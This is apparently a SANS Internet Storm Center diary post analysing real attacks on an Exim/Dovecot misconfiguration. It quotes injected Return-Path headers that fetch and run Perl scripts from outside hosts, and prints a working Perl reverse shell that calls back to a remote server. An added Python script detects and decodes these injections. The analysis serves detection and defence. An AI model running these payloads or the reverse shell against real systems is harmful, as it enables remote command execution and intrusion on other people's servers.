(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Sometimes it doesn't take an IDS to detect an attack; just reading your e-mail will do. Our reader Timo sent along these two e-mails he received, showing exploitation of a recent Dovecot/Exim configuration flaw [1]:

Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/exim``perl${IFS}/tmp/p.pl`@blaat.com>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from domain.local (disco.dnttm.ro [193.226.98.239])
       by [REMOVED]


Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/php.jpg``perl${IFS}/tmp/p.pl`@blaat.com>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from domain.local (disco.dnttm.ro [193.226.98.239])
       by [REMOVED]

The actual exploit sits in the "Return-Path" line, which records the envelope sender the attacker supplied in the SMTP "MAIL FROM" command. If Exim is used as a mail server, it can be configured to "pipe" messages to an external program in order to allow for more advanced delivery and filtering options. A common configuration pipes messages into the local delivery agent of Dovecot, which implements a POP3 and IMAP server. Sadly, the sample configuration provided for using Dovecot's delivery agent with Exim runs that delivery command through a shell and inserts the sender address into the command line without quoting or validating it, so the backtick-delimited commands inside the address are executed by the shell with the privileges of the delivery process. The ${IFS} sequences stand in for spaces: a bare space is not allowed in an SMTP address, but the shell expands ${IFS} to its field separator, which is whitespace by default, so "wget${IFS}-O${IFS}/tmp/p.pl" becomes "wget -O /tmp/p.pl" once the shell sees it.
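The following script is an added example, not code from the diary or from Exim or Dovecot. It does two things the paragraph above describes: it scans Return-Path headers for sender addresses carrying shell metacharacters and decodes the ${IFS}-obfuscated commands, and it demonstrates why the injection works by interpolating a harmless canary address into a command string that is handed to "sh -c", once unquoted (the weak form) and once shell-quoted (the equivalent of wrapping the address in Exim's ${quote:...} operator). The two injected Return-Path values are copied from the headers quoted above; the benign address, the canary address and the "echo delivering -f" command template are constructed stand-ins and only approximate the shape of the real dovecot-lda command line.

```python
"""Spot Exim/Dovecot sender-address injection in mail headers and show why it runs.

Added example, not code from the ISC diary or from Exim/Dovecot. The two
injected Return-Path values are the ones from the diary; the benign sender,
the canary and the command template are constructed for illustration.
"""
import re
import shlex
import shutil
import subprocess

# Sample headers: the first two Return-Path values are copied from the diary;
# the third is a constructed benign sender.
SAMPLE_HEADERS = [
    "Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/exim``perl${IFS}/tmp/p.pl`@blaat.com>",
    "Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/php.jpg``perl${IFS}/tmp/p.pl`@blaat.com>",
    "Return-Path: <alice@example.org>",
]

# Characters that let a sender address escape into a shell: backticks and
# $(...) for command substitution, ${...} for variable expansion (used by the
# attacker as ${IFS} to smuggle a space past SMTP address syntax), and the
# usual command separators. A legitimate envelope sender needs none of them.
SHELL_META = re.compile(r"`|\$\(|\$\{|[;|&<>]")


def return_path(header_line):
    """Pull the bare address out of a 'Return-Path: <...>' header line."""
    m = re.match(r"Return-Path:\s*<(.*)>\s*$", header_line)
    return m.group(1) if m else None


def is_injection(sender):
    """True if the sender address contains shell metacharacters."""
    return bool(SHELL_META.search(sender))


def decode_payload(sender):
    """Return the commands a shell would run for each backtick group,
    with ${IFS} turned back into the spaces the attacker could not send."""
    cmds = re.findall(r"`([^`]*)`", sender)
    return [c.replace("${IFS}", " ") for c in cmds]


def scan(headers):
    """Return (sender, decoded commands) for every injected Return-Path."""
    hits = []
    for line in headers:
        s = return_path(line)
        if s is not None and is_injection(s):
            hits.append((s, decode_payload(s)))
    return hits


# --- Why it runs: the command line is built as one string and given to sh -c.
# Constructed stand-in for the transport's command template; the real one
# calls dovecot-lda with the sender after -f. The canary echoes a marker
# instead of fetching anything.
CANARY = "x`echo INJECTED`@example.org"


def shell_available():
    return shutil.which("sh") is not None


def run_unquoted(sender):
    """Weak form: the sender is interpolated unquoted into the sh -c string,
    so the backtick group is executed and its output replaces it."""
    cmd = "echo delivering -f " + sender
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def run_quoted(sender):
    """Fixed form: the sender is shell-quoted before interpolation, so the
    shell sees the backticks as literal characters of one argument."""
    cmd = "echo delivering -f " + shlex.quote(sender)
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


if __name__ == "__main__":
    for sender, cmds in scan(SAMPLE_HEADERS):
        print("injected sender:", sender)
        for c in cmds:
            print("   would run:", c)
    if shell_available():
        print("unquoted:", run_unquoted(CANARY).strip())
        print("quoted:  ", run_quoted(CANARY).strip())
```

The same scan can be pointed at a mail log or a Maildir instead of the constructed list; any envelope sender that trips SHELL_META is worth alerting on regardless of whether the local transport is vulnerable. Note that Exim does not re-expand the contents of $sender_address, so the literal ${IFS} survives Exim's own string expansion and only turns into whitespace when the shell processes the command line; quoting with ${quote:...}, or not using a shell for the transport at all, is what stops it.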

The first payload fetches a file named "exim" and runs it with perl; it is a one-line Perl reverse shell connecting to port 9 on vps.usits.net (reformatted for readability, comments added):

use Socket;
$i="vps.usits.net";   # host the shell calls back to
$p=9;                 # port the shell calls back to
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))) {
  # duplicate the socket onto stdin, stdout and stderr ...
  open(STDIN,">&S");
  open(STDOUT,">&S");
  open(STDERR,">&S");
  # ... and replace this process with an interactive shell attached to it
  exec("/bin/sh -i");
};

The second payload fetches "php.jpg", which despite its name is another Perl script, and executes it. This one implements a simple IRC client connecting to mix.cf.gs on port 3303 (right now, this resolves to 140.117.32.135, but the host is not responding on port 3303).

For more details, see the write-up by RedTeam Pentesting [2].

[1] http://osvdb.org/show/osvdb/93004
[2] https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter
